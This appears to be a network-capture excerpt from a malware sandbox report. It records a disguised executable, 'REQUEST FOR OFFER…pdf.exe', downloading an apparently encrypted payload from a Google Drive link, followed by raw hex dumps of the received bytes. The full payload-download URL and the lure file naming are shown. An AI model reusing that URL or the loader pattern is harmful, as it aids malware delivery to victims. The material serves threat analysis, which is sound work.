Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp" Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-platform=, ch-ua-platform-version=* Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]} Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.11.20	49837	142.250.185.161	443	C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-29 23:31:35 UTC	1	OUT	GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/65eu063p0f9eoc2qkjfmonuuk5gkqmq4/1669764675000/03238822727237126472/*/1ZppbncXCwboWfcBo0A5zlqzevMjFwzpW?e=download&uuid=c4bc146b-22c6-4e17-89b8-c96a6eb96fab HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Cache-Control: no-cache Host: doc-0g-8k-docs.googleusercontent.com Connection: Keep-Alive
2022-11-29 23:31:36 UTC	2	IN	HTTP/1.1 200 OK X-GUploader-UploadID: ADPycdv6wOaMGU6kknlz6AnH1t0U5DDH3LO9_LkqC1CTutrIxYoEbqtmhx68eOthbcVhbVrwAeCRXGhiU9ku7RtHw1seVef0K0ba Content-Type: application/octet-stream Content-Disposition: attachment; filename="TgaUlpi157.dwp"; filename=UTF-8''TgaUlpi157.dwp Access-Control-Allow-Origin: Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context Access-Control-Allow-Methods: GET,HEAD,OPTIONS Content-Length: 106560 Date: Tue, 29 Nov 2022 23:31:36 GMT Expires: Tue, 29 Nov 2022 23:31:36 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=CwveRg== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close
2022-11-29 23:31:36 UTC	6	IN	Data Raw: c9 cb e8 98 67 e1 71 02 2d 29 12 5c 51 21 d9 49 5d 38 25 33 a3 f9 e8 d2 43 8d 40 5d ae 68 a5 89 3b 8e 15 cd b3 70 72 4f 8b 9c ac 44 64 ce 22 73 8d ad 0d 06 2d 33 3b ad d2 25 02 69 ed 40 9f 53 0e d4 86 b4 42 52 cb 7a 5a e7 bd 6f d0 84 ee 16 5b 0c c8 68 e8 c4 2c b2 61 14 90 42 c1 ae c7 bd 10 74 aa b1 b6 ee 1c 2e 65 a8 a7 cc 7d 44 25 df 7e 08 50 cd 83 1f f6 b9 34 ca 33 3a 1b 66 d8 42 73 50 02 60 6a aa 95 0a 96 1e f5 50 c7 c6 28 a7 4f 7a 25 32 e0 54 34 71 b6 5e e7 7c 09 e9 0d 9a 70 71 5b 1c 74 22 aa cd 16 7c 0e 4b 8d a4 d9 32 01 d1 cc b5 87 83 9c db 41 09 62 a5 e7 dc bc bf 2a df a0 0d b6 89 00 b1 c9 2f 88 17 fc ae d6 80 2a 7f 2e 03 d0 50 3f 13 13 a1 e2 fd 78 ed 93 c3 84 e2 2f 15 de 0c 18 96 18 67 8b 7c e7 01 fb c5 8e da 44 7c f5 4c 53 d3 bd 17 45 bd 09 11 6a Data Ascii: gq-)\Q!I]8%3C@]h;prODd"s-3;%i@SBRzZo[h,aBt.e}D%~P43:fBsP`jP(Oz%2T4q^\|pq[t"\|K2Ab/.P?x/g\|D\|LSEj
2022-11-29 23:31:36 UTC	10	IN	Data Raw: 46 c1 ae c4 7a 93 18 8e ad b7 9a 0e ab 9a a7 22 72 83 bb da 34 76 81 1c e9 9b 96 aa 9d 24 41 77 1e cf ed 8c 66 6d c4 f4 4a 72 41 c2 9a 3e f6 f0 95 02 bc ff 0b 36 cb 15 42 11 d7 6b 80 ab 17 83 1f 3e 0c 92 80 0d 62 f9 27 d7 94 e7 61 2e 15 eb 2f ed ab 0f d2 19 b4 2b 18 56 d0 12 15 5d cb 7a a5 6c 90 98 fb 63 db ac 1d b5 71 32 50 c4 51 ea 5c fd 84 d4 29 ab ab f3 27 df dc 2d be 58 8b 27 40 f6 41 85 d6 e7 b9 d8 13 64 69 59 34 93 ec c8 58 2d ad 3c a8 35 b1 5d 67 c0 51 cc 3f 3c 12 06 23 47 b2 ca 75 c8 de ed 0e 9f c3 00 62 34 ba 2a b1 d3 3b 07 7e 39 b8 51 81 c9 61 3c c3 d9 15 fa f1 45 e2 89 1a 3d b7 31 18 cc 3c aa 97 4e 39 27 23 0e 15 b4 d4 a7 83 ac 19 b0 2e 44 00 9f 90 c5 5e 46 c3 42 bc 5b a5 dc a1 41 37 d8 ed 2d a0 8b aa 9a 5e 0b 38 80 de e6 e6 df 97 df 67 48 9e Data Ascii: Fz"r4v$AwfmJrA>6Bk>b'a./+V]zlcq2PQ\)'-X'@AdiY4X-<5]gQ?<#Gub4*;~9Qa<E=1<N9'#.D^FB[A7-^8gH
2022-11-29 23:31:36 UTC	14	IN	Data Raw: e4 26 3a 57 3f 66 b2 57 50 34 ab 02 5d 3a 4a 3a 19 aa 04 8f c8 31 85 6b 00 2c aa aa ba f9 d2 81 21 7f b1 00 5a fb 79 8f 06 8f 0a b1 9c e7 09 2b 4b 33 78 96 2d 5a 80 fb 12 1d 0e 1c 52 2e 6c e0 15 3f 3c 93 39 05 88 ed 3d cc f1 a7 29 f8 3a 0d cc d0 33 66 93 54 b2 d1 f8 50 06 b8 54 89 71 60 e3 67 1a 41 71 1d b4 56 04 da 46 20 75 64 c4 56 f9 e1 4d b4 39 66 8f 87 53 61 a6 d3 52 19 ec ed 11 06 2b 1a d5 df f4 d0 7c f0 5b f8 1f c8 cf 3e e1 e0 28 5d c8 a9 9a 5b 4b 66 a2 e3 45 c2 21 de ad 4a 21 4c 25 f0 83 d4 1f 08 76 8c 3d f3 43 40 e2 ce 1c 0a 9d e0 c1 c0 5e 3e 85 75 a7 57 4f 34 a1 64 98 84 69 a3 72 d4 b0 d9 d2 c9 2f 24 5c 9b 40 6a 8d 52 3d 3b 99 f4 1c 83 50 69 93 a6 a0 26 df a4 b7 cb 70 88 5e 40 6e 65 6d 65 7d fc 67 34 c7 5a a3 62 3c 84 73 ef 56 52 d3 c0 10 00 7b Data Ascii: &:W?fWP4]:J:1k,!Zy+K3x-ZR.l?<9=):3fTPTq`gAqVF udVM9fSaR+\|[>(][KfE!J!L%v=C@^>uWO4dir/$\@jR=;Pi&p^@neme}g4Zb<sVR{
2022-11-29 23:31:36 UTC	18	IN	Data Raw: 37 1d dd fb f5 55 5c 29 eb 05 7a cf 72 89 25 46 70 d9 7b cc 6b 11 36 a8 4b 96 a4 4b db 9f a6 27 75 67 3e 3a 6b 4c 82 71 9d 92 5c 96 73 63 b6 9a 4d d8 2b 4a fe 4f e8 28 28 8f fd 10 df 68 a8 c5 e3 6e a6 88 96 ef b0 1f 2e d9 84 b9 d8 d9 cf 42 4c e6 64 74 8b ca 72 02 0f fe e8 ae c0 34 c1 0d c1 7f b3 a0 9e f3 dc 9e ce 1c ed 43 f1 50 f6 07 94 ec 8e a2 7b d5 1f ef ad 85 f3 42 2c 7c 05 61 41 97 00 37 0d c8 c0 57 64 48 61 98 15 e5 76 2b ad d2 7c 52 c6 29 ed 8c b9 81 b3 06 d9 56 fb 2d a5 e7 Data Ascii: 7U\)zr%Fp{k6KK'ug>:kLq\scM+JO((hn.BLdtr4CP{B,\|aA7WdHav+\|R)V-
2022-11-29 23:31:36 UTC	18	IN	Data Raw: 9e 6d e0 c6 d2 a5 ab 73 73 f7 38 81 d4 6c 5b c3 74 7e eb f4 8a fe 1c 5e 59 40 2c 1e 29 c1 b9 e8 6b 18 16 22 94 b9 24 cb 93 d9 a7 ab 7c 00 c9 e0 58 3e 12 5b e7 53 9d 29 99 7c c4 14 03 af 47 b3 58 f1 c2 b6 7d 03 1e 08 44 4c f2 e1 01 6a e7 f3 1a b3 53 64 fc ac 2e 44 59 5e 50 cf d6 d6 c2 28 4f 7a 56 5c e1 cb c3 9c 35 80 31 1d 9d 00 eb 51 7a d1 75 cc 1c 40 7e 76 ab f7 6e 6a 59 9e 31 10 04 92 fe b8 b8 fc cc 1e 5a 1f 1d 00 4a 1b 3d 9f 14 d3 31 c1 64 a9 dd 66 cd 34 04 71 59 1f 4c 89 6b fe 6b 27 bd 4a a2 e4 84 3d fa e2 5d 43 3d 3c 90 d4 94 6d 7d 54 e1 17 53 0e 4a ba 6f 97 72 b0 e0 25 2d 90 0a b1 2d f9 93 70 c2 e8 1b d2 27 28 ef af 97 01 93 18 d2 14 98 09 b5 eb cd 92 f7 57 6e c8 d0 e4 a7 9e 98 16 4d 71 fe 42 37 00 37 45 62 ef ee d8 c2 02 07 07 2e 53 c2 23 36 bc 2e Data Ascii: mss8l[t~^Y@,)k"$\|X>[S)\|GX}DLjSd.DY^P(OzV\51Qzu@~vnjY1ZJ=1df4qYLkk'J=]C=<m}TSJor%--p'(WnMqB77Eb.S#6.
2022-11-29 23:31:36 UTC	19	IN	Data Raw: 84 50 db f5 ce bb c4 d5 f7 fa 52 cb 35 6a 09 2b 39 86 1f be 1a 33 82 00 1f 63 b2 bb 59 81 14 e2 fd 87 30 d9 8a c1 4e cf f8 06 88 3b b0 2b 13 3b d1 34 c6 f2 07 6f 11 dc eb 25 4a 60 9e be 83 d9 1a 75 ed 3a d6 28 d0 a9 8e fb d2 33 63 63 cd e7 dc bc 3f 19 67 d0 0c ee ae ee 95 3c 7f 1d 45 8b 0d 44 b8 ab ab bb f8 0f 94 37 e3 1b fb ff b8 12 b1 7a 91 84 0f ce e9 00 5f de b0 dd 6c 25 29 19 ca 6c 97 06 76 52 91 0e bf ce 3b 30 46 06 64 82 34 44 9a 2c 3f 4e da a4 d7 65 4d 8f fc 6c fd 30 7e 6f af e9 3b 90 d2 ac 59 6d b1 01 91 21 85 0f 7d 5a b2 72 ab 86 dc 9a d4 6f ee a7 4b 3f aa c2 23 fd 23 29 fe ef 4a e6 d1 94 08 07 e4 8d 81 01 98 49 73 65 50 8a 49 b2 ee e0 56 40 a0 0b aa 9a 08 db 07 54 68 38 09 dc 1c d0 77 9e b4 bd f5 03 2b 46 40 86 13 33 f8 a0 30 cc ec f8 07 65 70 Data Ascii: PR5j+93cY0N;+;4o%J`u:(3cc?g<ED7z_l%)lvR;0Fd4D,?NeMl0~o;Ym!}ZroK?##)JIsePIV@Th8w+F@30ep
2022-11-29 23:31:36 UTC	20	IN	Data Raw: 33 48 7a c9 66 66 7c 89 4f 3a 11 03 7f 40 f5 62 49 56 5b d6 e4 76 63 a1 30 55 ad 4b 69 42 08 b2 9f c6 ee 3d 4e eb 13 c4 f4 58 52 68 1c 58 63 ca 51 5d 2f 67 7f b7 09 9a 1a d2 6d 60 f2 92 5b 25 22 c2 de a6 c5 1c 33 c5 c0 5b 56 7b 46 74 03 d4 ba b5 61 4e 9d 7e 8c c5 7f a1 3c 21 cf 4d 9b c4 94 52 36 3d 5a 9e bb 9d 95 40 a5 38 da ef 10 ca f1 06 3f 86 8b 03 78 bb 9c 11 cf 5e 53 83 b2 10 2b 1c a8 5d 01 6a 45 ec ff 7b 36 4a f3 68 6b 61 a0 72 c4 9a bd 2d e9 7c 7d 64 c0 aa fc 11 be 9c 37 9f 88 b5 c7 fd 29 aa 90 4f 9f 4e e4 f9 8c 67 eb d7 7c 77 de eb f6 e7 c0 ca ee c8 d6 8c 5a b0 dc a9 76 f0 42 2b d7 3f 5c 5a d5 ca 2c 8d 29 77 fd cb 17 dc a2 0c ad bc 42 94 87 88 62 13 55 5b 16 ad bd 80 b1 22 7d e1 2d 1e 0e 20 40 d0 55 66 62 aa 2c 4f 66 18 0c 4a 8b 2f 14 ff 61 06 c5 Data Ascii: 3Hzff\|O:@bIV[vc0UKiB=NXRhXcQ]/gm`[%"3[V{FtaN~<!MR6=Z@8?x^S+]jE{6Jhkar-\|}d7)ONg\|wZvB+?\Z,)wBbU["}- @Ufb,OfJ/a
2022-11-29 23:31:36 UTC	21	IN	Data Raw: fb 76 3e c3 c6 46 68 aa 9d 33 85 dc 54 57 cb fc 47 c0 6d 3f 48 51 0d 92 df 4f 06 c4 13 41 f6 2f c8 c2 8a 47 92 2d 9b 9f f8 b0 3b da d1 f6 33 c3 74 53 a4 e5 01 3e 8e d5 ac 27 5d f6 1f e6 c4 26 bb 5d 42 51 e5 fd dc 85 7e ea 08 cd c6 c7 55 e0 75 a0 c0 94 6c 55 65 d3 c5 00 d5 b4 b5 b1 20 e2 bd dd 36 8c ff 7a 00 3c 6c 34 ba b3 e6 64 c0 dc c6 c7 1a ba 8a fb 9d f3 9e 9e 3b 7b a7 5e 21 37 a4 bf 1c bb 0f 1e 8f 44 9f 4c 2f cd 2f db 29 c7 ef 77 52 bc fd ba 30 a3 1e 2a 97 20 86 0a 20 1a d1 4a a0 16 d5 c4 0a cd 23 66 49 e0 cf d8 6b 08 e7 dd b0 9c 61 77 85 36 56 d4 6b 7c 9d 2b 6e 5b fe 26 d1 ba a5 55 ff 70 38 6c 40 5a c5 4b b7 7a 70 4c ae a3 aa e6 5f 2c 1e d7 39 1f bd c0 af 74 fe 12 8a b2 73 c8 51 2f 65 e5 8c 65 cf 1e 34 e9 a5 18 26 dd 80 86 70 c4 14 07 af e2 e6 64 d1 Data Ascii: v>Fh3TWGm?HQOA/G-;3tS>']&]BQ~UulUe 6z<l4d;{^!7DL//)wR0* J#fIkaw6Vk\|+n[&Up8l@ZKzpL_,9tsQ/ee4&pd
2022-11-29 23:31:36 UTC	23	IN	Data Raw: f2 42 59 f3 68 77 69 29 6a c4 95 67 0e 9b ed 5f ab b2 72 5e 19 c0 40 3e 54 f5 40 c6 b9 91 3c a1 9b f2 20 7e 76 76 64 aa 11 c5 14 bb e0 38 e4 e9 c7 75 fa 28 04 58 0b 9d ca ea f8 c8 76 8c ee 56 4a a3 c9 e0 2b 04 47 70 60 18 d7 00 ba ec be eb 57 b8 7e 76 f0 19 06 e1 8c ba 53 25 6e ec f6 36 bf 59 8e bc 7e b2 9d e3 b3 22 fa 83 3d d1 b4 c6 20 c5 31 d8 f5 13 e1 c2 53 85 81 d9 33 f3 45 bc 7d 65 e5 0f 45 d1 ac 53 0b 75 b5 61 73 99 04 e9 c8 cb 36 e3 c2 72 cb 92 8f 3c 42 90 76 48 2e fd 0b 59 43 84 6b 28 3c 3f 74 e4 a3 8b 97 f9 79 19 41 35 aa 3c cb 1e b9 8b c0 0d 2c b9 75 cf 21 51 45 0c da b8 af 5e 75 40 30 bf c1 b7 ad 76 b2 40 2d a7 20 6d 6a 1e 17 8a bb 2f f5 91 4c fb 2c 27 96 0a 05 42 19 76 43 80 13 3f 4e 1e 5b 47 23 1e 06 62 f9 26 0a db 3a fe f5 40 eb 87 9f 60 ff Data Ascii: BYhwi)jg_r^@>T@< ~vvd8u(XvVJ+Gp`W~vS%n6Y~"= 1S3E}eESuas6r<BvH.YCk(<?tyA5<,u!QE^u@0v@- mj/L,'BvC?N[G#b&:@`
2022-11-29 23:31:36 UTC	24	IN	Data Raw: ff 3c e3 ac 25 25 e5 af 49 6d 41 ec 66 5a f8 12 af 16 ac 40 30 3c 19 24 36 a1 96 ea 2c 0d a8 b9 9b 18 6d db a9 fa 83 97 52 89 1a b8 66 7b e0 f7 59 9b e0 93 07 e2 f3 a7 51 17 77 1d 70 f4 38 18 ef a3 5c 53 4b 85 17 98 2a a1 e7 07 57 14 5e d5 52 62 20 93 bb 9e bb 24 05 66 41 cb 4e f4 3c ca cd 6d 71 1b 5b c8 ed fd 41 29 3b 1e 67 35 2b 3e 55 d9 9f 65 de 5c c2 bf 13 00 1b d3 c0 85 41 00 ae 32 00 a1 f1 c8 77 e3 99 2f 94 98 87 fd 01 44 b3 fd b2 79 f6 4f 2c 69 4b 1a 25 22 ff f1 1c 9a 7a fe a6 a2 29 6f c9 58 74 ab 46 6c 78 c7 02 51 52 d8 73 42 05 1d 0a 47 47 0c 0f 48 a7 ab f2 f1 34 cb 46 94 31 0e ef 0f 84 19 ff 49 5c be 41 8a 74 9b dc 7e f8 00 47 5b 22 3b aa 92 44 d0 3a 5e c4 ae 60 d5 20 9d 2d 91 e9 3d 03 bf 99 79 62 45 6f 9c a2 ca ba 61 8b ed 2e fa 28 a8 73 f1 30 Data Ascii: <%%ImAfZ@0<$6,mRf{YQwp8\SK*W^Rb $fAN<mq[A);g5+>Ue\A2w/DyO,iK%"z)oXtFlxQRsBGGH4F1I\At~G[";D:^` -=ybEoa.(s0
2022-11-29 23:31:36 UTC	25	IN	Data Raw: e9 be b1 14 16 59 40 43 e6 89 86 86 97 a1 78 b6 2c 65 90 d0 84 9b 1a 1c 79 c0 97 38 99 ef e7 aa f8 fa 42 ab ae af 69 4b f2 7c db b4 06 b2 f6 9a 57 58 b9 71 bb 50 d7 81 d8 0d 0e d6 94 1a d3 34 a0 33 52 b8 63 62 a4 17 4d 50 ff b2 e1 63 38 c2 aa 0b 69 02 18 ac 92 e5 5c 8e ae f8 3b 39 03 bf 2e 9e 99 86 ed 61 1d 70 89 c6 86 ab 25 cf 5c 43 19 9f 1e c1 14 5a 4f af eb 23 3c c3 8e fb d1 0d 3c a5 fb 1d b6 be 57 b2 ca 27 0c c1 50 1e e3 91 de 5d ef ff ee aa 2d c1 ab d3 af 86 ff e9 d4 50 ea 93 88 0d be 7a 1b 19 bd 43 b4 a8 d5 06 c4 f5 08 bb 84 e7 41 87 68 6c 76 3a 00 9b a4 96 14 34 2b dc c8 7f 42 83 b9 6a a8 d9 02 b1 76 3b 5a eb 51 50 57 d1 96 54 f9 ae 08 4b d6 a9 ce e5 d1 31 ce a9 19 cf fc f3 25 61 61 e0 ee 33 49 f1 4d 30 5d 94 27 8f 28 7c ff 52 06 e5 6d f8 1d 8d e7 Data Ascii: Y@Cx,ey8BiK\|WXqP43RcbMPc8i\;9.ap%\CZO#<<W'P]-PzCAhlv:4+Bjv;ZQPWTK1%aa3IM0]'(\|Rm
2022-11-29 23:31:36 UTC	26	IN	Data Raw: d9 d9 19 43 9c f2 a6 35 75 c3 8f c6 19 e5 38 a3 6b 5e 8b 01 fe 3e bb e7 83 97 e3 27 88 cb 9b 97 ac 4d f9 72 e2 0e 02 8b aa c3 16 04 14 c6 b8 b8 80 7d 02 96 b1 94 00 4b 0f 2a e2 84 ef 9b 79 5a f0 63 6f 6a ad 97 e1 f1 6f 58 34 78 6d 1d dc 1c 7c 91 c4 26 84 6f 5f 09 51 9f 2a 14 d3 e0 d7 20 86 7a 2c ad c0 f9 b1 6d a4 b2 b6 3b 6e bc c8 fa 24 e6 48 01 70 a6 a1 45 86 4f 65 8f 1a a3 53 7a 46 27 bc 8f 55 87 61 3a e6 d7 50 b6 fd f1 5a 1c fc e4 24 e7 99 66 05 95 f3 e2 0a 9d 3d 62 c5 81 35 59 37 5f 70 2a 72 6e b3 88 24 60 39 55 7b f7 53 af 89 2f 10 9b e3 ee 5b ba dc 5a 35 78 55 58 b4 d2 98 b3 de ba 10 15 65 9e 3e a7 7f dc d3 af e4 0a c5 b3 03 d1 4f d9 ba 34 ca 8b 56 ed 0c fc ff 2f bf b8 64 09 cb 34 bb b0 4a d4 f5 68 8b b7 cc de 61 a4 33 a1 f7 f0 95 b5 89 8d cd 13 4a Data Ascii: C5u8k^>'Mr}KyZcojoX4xm\|&o_Q z,m;n$HpEOeSzF'Ua:PZ$f=b5Y7_p*rn$`9U{S/[Z5xUXe>O4V/d4Jha3J
2022-11-29 23:31:36 UTC	27	IN	Data Raw: 55 be da 74 9b 51 ad d2 cd 37 39 ea 91 d2 de 5b ed f9 a6 2c ac 7e 2c 0d fa 38 6a 13 c4 6e e1 3c ce 47 a8 f9 57 b0 dd aa 0d 25 84 03 25 97 f9 2f d1 ac 85 e0 31 77 c3 b6 3a f8 b4 64 83 33 23 d2 77 7a 49 50 db 31 f3 f3 6c 5b d1 3f f7 f4 7c fb e4 82 aa 4e 38 f2 26 eb a3 7a f0 74 52 51 d7 6f 49 44 47 d0 a8 48 0f 0b 61 25 8f d7 fb 9c 9e 4b ec e6 3a de 1d 08 31 e5 bc bf 53 f1 82 b9 31 a5 8a 49 f2 ce e0 56 a5 e5 77 23 e7 a2 d8 ae 6c eb 1b 1d 20 14 69 9f 4c 9c 74 0b 77 12 f4 c2 13 a4 54 6b d4 2a c8 1c 01 05 2b 8f 21 9d 9d 97 32 9f 30 ba 7c f4 a6 dc 04 ff 1c ed eb 0f a8 63 d7 9f c7 60 ee 68 40 49 0c 93 05 0d a6 5e 68 ec a7 bd 46 36 bc f9 61 5d 5c 53 67 c3 02 73 ae 71 1a e6 44 73 64 34 c7 5a a3 68 85 98 f2 26 a9 52 0f 0b 10 e9 61 1f 3e 5f aa 86 d1 4f f4 80 92 b0 fc Data Ascii: UtQ79[,~,8jn<GW%%/1w:d3#wzIP1l[?\|N8&ztRQoIDGHa%K:1S1IVw#l iLtwTk*+!20\|c`h@I^hF6a]\SgsqDsd4Zh&Ra>_O
2022-11-29 23:31:36 UTC	29	IN	Data Raw: f7 82 76 f3 86 2a b7 9f f3 7a 75 8e 52 90 e1 e9 3c 0d 78 c3 c9 52 2f 3d 84 03 b4 9e d2 27 bd 4c 21 9b de ac 56 d5 2a 5c 5f 77 df 44 b3 23 9b 5f 62 4d d9 0c 7f fc a6 2e c5 77 1d 12 85 16 78 35 22 e6 a4 5f 3e 6c 71 c9 62 74 78 ac 8e 58 4d 7b 23 e5 fc 24 e2 74 c7 0c 23 14 ee ee e5 46 8e 7b b3 e6 c9 60 59 67 70 77 ef 5d 92 33 dd be 71 30 8b 23 f9 70 1d f0 44 e6 96 03 bb c2 c5 b6 57 ac 9c 47 40 9f b3 8e 5c dd e7 ca d7 e1 26 cc d1 6c c7 97 f3 cb 35 0f 9e c0 eb f9 ca 5f e5 49 93 4b b6 0c 55 87 83 49 f9 dc 0b b1 0e 6c e9 ad 33 c9 33 bd 39 03 67 62 3c 0b 65 b0 8b 0c cc 2a 60 c2 a1 25 dc d5 37 80 41 5c 87 86 34 85 09 0f 9a ac d0 84 b7 4f b5 e4 d7 ab 17 3b 75 ed 7a 4a 1b a7 9c 6d 92 36 fc 47 6a e1 e6 86 6a f8 75 7e f7 24 42 8d da 20 81 7d 5c 32 f6 17 09 69 69 09 66 Data Ascii: vzuR<xR/='L!V\_wD#_bM.wx5"_>lqbtxXM{#$t#F{`Ygpw]3q0#pDWG@\&l5_IKUIl339gb<e*`%7A\4O;uzJm6Gjju~$B }\2iif
2022-11-29 23:31:36 UTC	30	IN	Data Raw: 2e 93 5f 88 f8 0f a6 1a a4 da 87 af 8b c9 d5 45 f3 c7 27 6d 16 ce 11 81 28 56 25 6e 5a 39 b2 97 dd 3b 3f d5 02 6e e7 75 b4 f8 cb f0 34 f0 50 e3 16 bc 84 b0 a3 0e 36 d0 52 6c 63 e6 9a 45 a2 69 4f 5b a1 97 5c 95 30 95 9e c8 f6 37 b5 0d cb cf 6f a4 35 66 72 37 67 82 2c b9 33 8e 54 8f e6 e1 88 f1 26 a9 6e 59 38 5d 13 31 49 d9 db a5 0e da 58 c6 b2 6d e7 2f cf 87 95 4d 96 f1 8c a1 70 a3 af bf d3 b7 0a a1 a4 ec dc 0f 15 41 c7 4e 1b 64 a9 b5 b8 9a 58 c9 99 f7 2e 30 bb 5b c8 ad 7d 53 1a 7f bf dc 0b 50 97 84 9b 5b 3c a2 d7 91 1e d3 69 2a 8e 88 18 29 d8 45 bf b3 d9 93 61 63 d8 94 04 1e c1 58 bf 25 0d f0 9f 12 2d 69 c0 43 b3 ff 30 5e 83 1e 51 b5 e0 7f 23 c1 4e 10 c2 5c c4 f3 07 9e 40 49 ad a6 48 44 6e df 7e 57 44 c2 e9 e6 83 91 ee 00 66 4a 47 8f 3d 3d ef 0f 74 11 50 Data Ascii: ._E'm(V%nZ9;?nu4P6RlcEiO[\07o5fr7g,3T&nY8]1IXm/MpANdX.0[}SP[<i*)EacX%-iC0^Q#N\@IHDn~WDfJG==tP
2022-11-29 23:31:36 UTC	31	IN	Data Raw: 6c 1e 9d 1d 8a 55 21 3f 68 8b e6 bf 5d 88 d4 30 f8 c9 e0 f7 5f fd 7d 10 aa 0c 43 8e 4f 91 79 35 1b 7a d1 47 2c 81 99 97 68 59 50 58 49 53 e2 c5 19 9c 5d 33 5f db bf 31 09 75 42 f3 dd 57 b4 a9 d4 cf 7a 5e b5 ed 87 ca 82 11 e9 68 f4 4b ac e4 4d 11 1a 81 55 90 c9 0b 27 ca 11 b0 35 aa 34 49 9b 18 ab ac dc c7 9a f6 31 39 5a 88 7c 54 46 85 f4 f4 8a f4 43 76 c2 66 23 20 db 2f 1f 33 2b 7e 74 9c 38 c2 be 77 79 f6 e7 e5 9d 76 f6 70 52 19 7e 5b fc a2 3f 5e 4d 38 ed 66 a4 53 b9 13 79 54 50 5c 67 02 90 a0 1e db 6e 58 67 62 3b 5e a4 ac 05 d4 29 ec 0f 51 65 a7 37 b7 ed b6 fa 4f 0e c1 da 4f 45 72 43 c0 e5 ff e7 9d ee fe 20 57 25 14 ec a4 eb 4c 81 45 6c a5 c4 4c 10 1c c9 73 ac da f5 12 72 ac 10 8c 5a 29 b5 64 25 16 ff 17 29 92 e8 4a 29 fc a5 c9 03 c5 49 f9 05 04 42 e5 8d Data Ascii: lU!?h]0_}COy5zG,hYPXIS]3_1uBWz^hKMU'54I19Z\|TFCvf# /3+~t8wyvpR~[?^M8fSyTP\gnXgb;^)Qe7OOErC W%LElLsrZ)d%)J)IB
